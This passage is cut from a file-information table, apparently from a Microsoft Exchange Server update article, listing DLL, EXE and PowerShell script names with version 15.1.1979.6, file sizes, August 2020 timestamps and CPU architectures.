15.1.1979.6| 14,216| 12-Aug-2020| 20:49| x86 \nInterop.netfw.dll| 15.1.1979.6| 34,176| 12-Aug-2020| 20:46| x86 \nInterop.plalibrary.dll| 15.1.1979.6| 72,576| 12-Aug-2020| 20:48| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.1979.6| 27,008| 12-Aug-2020| 20:48| Not applicable \nInterop.taskscheduler.dll| 15.1.1979.6| 46,472| 12-Aug-2020| 20:47| x86 \nInterop.wuapilib.dll| 15.1.1979.6| 60,808| 12-Aug-2020| 20:48| x86 \nInterop.xenroll.dll| 15.1.1979.6| 39,816| 12-Aug-2020| 20:48| x86 \nKerbauth.dll| 15.1.1979.6| 62,848| 12-Aug-2020| 20:49| x64 \nLicenseinfointerface.dll| 15.1.1979.6| 643,464| 12-Aug-2020| 20:48| x64 \nLpversioning.xml| Not applicable| 19,638| 12-Aug-2020| 20:48| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,904| 12-Aug-2020| 20:49| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.1.1979.6| 138,632| 12-Aug-2020| 20:49| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 125,841| 12-Aug-2020| 20:48| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,356| 12-Aug-2020| 20:48| Not applicable \nMce.dll| 15.1.1979.6| 1,692,544| 12-Aug-2020| 20:48| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,503| 12-Aug-2020| 20:48| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,623| 12-Aug-2020| 20:49| Not applicable \nMicrosoft.database.isam.dll| 15.1.1979.6| 127,352| 12-Aug-2020| 20:49| x86 \nMicrosoft.dkm.proxy.dll| 15.1.1979.6| 25,984| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.1.1979.6| 68,488| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.1.1979.6| 232,832| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.1.1979.6| 15,752| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.1.1979.6| 43,392| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.1.1979.6| 1,775,488| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.airsync.dll1| 15.1.1979.6| 505,728| 12-Aug-2020| 20:47| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.1.1979.6| 76,160| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.anchorservice.dll| 15.1.1979.6| 135,552| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.1.1979.6| 23,424| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.1.1979.6| 15,744| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.1.1979.6| 27,008| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.approval.applications.dll| 15.1.1979.6| 53,632| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.assistants.dll| 15.1.1979.6| 924,032| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.1.1979.6| 25,992| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.1.1979.6| 42,376| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.1.1979.6| 15,240| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.1.1979.6| 14,712| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.1.1979.6| 70,528| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.1.1979.6| 94,592| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.1.1979.6| 13,184| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.1.1979.6| 15,744| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.1.1979.6| 36,736| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.1.1979.6| 15,744| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.1.1979.6| 79,752| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.autodiscover.dll| 15.1.1979.6| 396,160| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.1.1979.6| 21,384| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.1.1979.6| 57,216| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.1.1979.6| 14,720| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.batchservice.dll| 15.1.1979.6| 35,712| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.cabutility.dll| 15.1.1979.6| 276,360| 12-Aug-2020| 20:48| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.1.1979.6| 16,256| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.1.1979.6| 25,984| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.1.1979.6| 13,696| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.1.1979.6| 23,424| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.clients.common.dll| 15.1.1979.6| 377,216| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.1.1979.6| 83,848| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.clients.owa.dll| 15.1.1979.6| 2,970,504| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.1.1979.6| 5,029,248| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.1.1979.6| 894,856| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.clients.security.dll| 15.1.1979.6| 413,568| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.clients.strings.dll| 15.1.1979.6| 924,544| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.1.1979.6| 31,616| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.cluster.common.dll| 15.1.1979.6| 52,104| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.1.1979.6| 21,888| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.1.1979.6| 33,664| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.1.1979.6| 3,478,408| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.1.1979.6| 108,416| 12-Aug-2020| 20:48| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.1.1979.6| 288,640| 12-Aug-2020| 20:48| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.1.1979.6| 621,960| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.1.1979.6| 86,400| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.1.1979.6| 1,828,736| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.1.1979.6| 31,608| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.1.1979.6| 465,792| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.1.1979.6| 25,480| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.1.1979.6| 38,264| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.1.1979.6| 102,792| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.1.1979.6| 48,512| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.1.1979.6| 67,464| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.common.dll| 15.1.1979.6| 172,936| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.1.1979.6| 113,536| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.common.il.dll| 15.1.1979.6| 13,704| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.common.inference.dll| 15.1.1979.6| 130,432| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.common.optics.dll| 15.1.1979.6| 63,880| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.1.1979.6| 19,840| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.1.1979.6| 15,232| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.common.search.dll| 15.1.1979.6| 107,912| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.1.1979.6| 17,800| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.common.smtp.dll| 15.1.1979.6| 51,584| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.1.1979.6| 36,736| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.1.1979.6| 27,520| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.1.1979.6| 1,042,304| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.commonmsg.dll| 15.1.1979.6| 29,048| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.1.1979.6| 13,184| 12-Aug-2020| 20:48| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.1.1979.6| 181,120| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.1.1979.6| 30,080| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.compliance.common.dll| 15.1.1979.6| 22,400| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.1.1979.6| 85,896| 12-Aug-2020| 20:46| x64 \nMicrosoft.exchange.compliance.dll| 15.1.1979.6| 41,344| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.1.1979.6| 37,240| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.1.1979.6| 50,560| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.1.1979.6| 33,144| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.1.1979.6| 1,100,672| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.1.1979.6| 206,728| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.1.1979.6| 210,824| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.compression.dll| 15.1.1979.6| 17,288| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.1.1979.6| 37,760| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.1.1979.6| 14,216| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.configuration.core.dll| 15.1.1979.6| 145,792| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.1.1979.6| 14,208| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.1.1979.6| 53,128| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.1.1979.6| 15,752| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.1.1979.6| 23,432| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.1.1979.6| 13,192| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.1.1979.6| 54,664| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.1.1979.6| 13,696| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.1.1979.6| 1,844,616| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.1.1979.6| 30,088| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.1.1979.6| 68,488| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.1.1979.6| 15,232| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.1.1979.6| 21,376| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.1.1979.6| 13,192| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.1.1979.6| 25,992| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.connections.common.dll| 15.1.1979.6| 169,864| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.connections.eas.dll| 15.1.1979.6| 330,112| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.connections.imap.dll| 15.1.1979.6| 173,952| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.connections.pop.dll| 15.1.1979.6| 71,040| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.1.1979.6| 203,648| 12-Aug-2020| 20:48| x64 \nMicrosoft.exchange.context.client.dll| 15.1.1979.6| 27,008| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.context.configuration.dll| 15.1.1979.6| 51,584| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.context.core.dll| 15.1.1979.6| 51,072| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.1.1979.6| 46,976| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.core.strings.dll| 15.1.1979.6| 1,092,488| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.core.timezone.dll| 15.1.1979.6| 57,216| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.1.1979.6| 326,528| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.1.1979.6| 3,352,968| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.1.1979.6| 35,720| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.data.connectors.dll| 15.1.1979.6| 165,248| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.1.1979.6| 619,400| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.data.directory.dll| 15.1.1979.6| 7,781,256| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.1.1979.6| 80,256| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.data.dll| 15.1.1979.6| 1,785,728| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.1.1979.6| 1,626,496| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.data.ha.dll| 15.1.1979.6| 362,376| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.1.1979.6| 105,856| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.1.1979.6| 15,736| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.1.1979.6| 224,640| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.data.mapi.dll| 15.1.1979.6| 186,752| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.1.1979.6| 39,808| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.metering.dll| 15.1.1979.6| 119,168| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.1.1979.6| 968,064| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.data.notification.dll| 15.1.1979.6| 141,184| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.1.1979.6| 769,416| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.data.providers.dll| 15.1.1979.6| 139,648| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.1.1979.6| 56,712| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.1.1979.6| 452,992| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.1.1979.6| 32,640| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.1.1979.6| 256,392| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.data.storage.dll| 15.1.1979.6| 11,641,224| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.1.1979.6| 37,768| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.1.1979.6| 655,736| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.1.1979.6| 174,464| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.1.1979.6| 36,232| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.1.1979.6| 14,216| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.1.1979.6| 14,216| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.1.1979.6| 14,720| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.1.1979.6| 72,576| 12-Aug-2020| 20:52| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.1.1979.6| 13,192| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.1.1979.6| 22,912| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.diagnostics.dll| 15.1.1979.6| 2,210,176| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.1.1979.6| 23,936| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.1.1979.6| 546,688| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.1979.6| 215,424| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.1979.6| 193,416| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.1.1979.6| 146,312| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.1979.6| 27,512| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.1979.6| 13,704| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.1979.6| 49,544| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.1979.6| 28,032| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.1979.6| 208,768| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.1.1979.6| 88,960| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.1.1979.6| 32,648| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.1979.6| 45,952| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.1.1979.6| 18,816| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.dxstore.dll| 15.1.1979.6| 473,464| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.1979.6| 206,216| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.1979.6| 36,736| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.1.1979.6| 131,464| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.1979.6| 21,888| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.1.1979.6| 148,352| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.1979.6| 220,032| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.1979.6| 23,936| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.1979.6| 97,664| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.1.1979.6| 1,266,056| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.1979.6| 1,266,056| 12-Aug-2020| 20:47| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 15,859| 12-Aug-2020| 20:50| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.1979.6| 87,424| 12-Aug-2020| 20:50| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 66,126| 12-Aug-2020| 20:50| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.1979.6| 52,104| 12-Aug-2020| 20:50| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.1979.6| 294,272| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.1979.6| 73,088| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.1979.6| 45,944| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.entities.booking.dll| 15.1.1979.6| 218,504| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.1.1979.6| 78,208| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.1.1979.6| 35,712| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.1.1979.6| 934,280| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.common.dll| 15.1.1979.6| 336,264| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.1.1979.6| 52,608| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.1979.6| 32,128| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.context.dll| 15.1.1979.6| 60,800| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.1.1979.6| 854,408| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.1979.6| 291,720| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.1979.6| 39,296| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.1979.6| 76,168| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.insights.dll| 15.1.1979.6| 166,784| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.1979.6| 1,486,720| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.1979.6| 122,240| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.1979.6| 12,327,288| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.1979.6| 264,056| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.people.dll| 15.1.1979.6| 37,760| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.1979.6| 186,752| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.1.1979.6| 64,384| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.1.1979.6| 83,848| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.1.1979.6| 63,872| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.1.1979.6| 100,232| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.1.1979.6| 144,768| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.1979.6| 270,216| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.1.1979.6| 15,240| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.1979.6| 15,752| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.eserepl.dll| 15.1.1979.6| 130,440| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.1.1979.6| 254,336| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.1979.6| 13,184| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.1979.6| 37,248| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.1.1979.6| 640,392| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.1.1979.6| 37,256| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.1.1979.6| 146,304| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.1979.6| 13,184| 12-Aug-2020| 20:46| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.1979.6| 592,768| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.1979.6| 14,728| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.1979.6| 30,072| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.1979.6| 99,720| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.1979.6| 42,376| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.helpprovider.dll| 15.1.1979.6| 40,320| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.1979.6| 54,144| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.1.1979.6| 163,712| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.1979.6| 58,752| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.1979.6| 204,160| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.1979.6| 30,592| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.1979.6| 38,784| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.1979.6| 48,512| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.1979.6| 180,608| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.1979.6| 36,736| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.httputilities.dll| 15.1.1979.6| 25,984| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.1.1979.6| 1,868,168| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.1979.6| 54,656| 12-Aug-2020| 20:48| x86 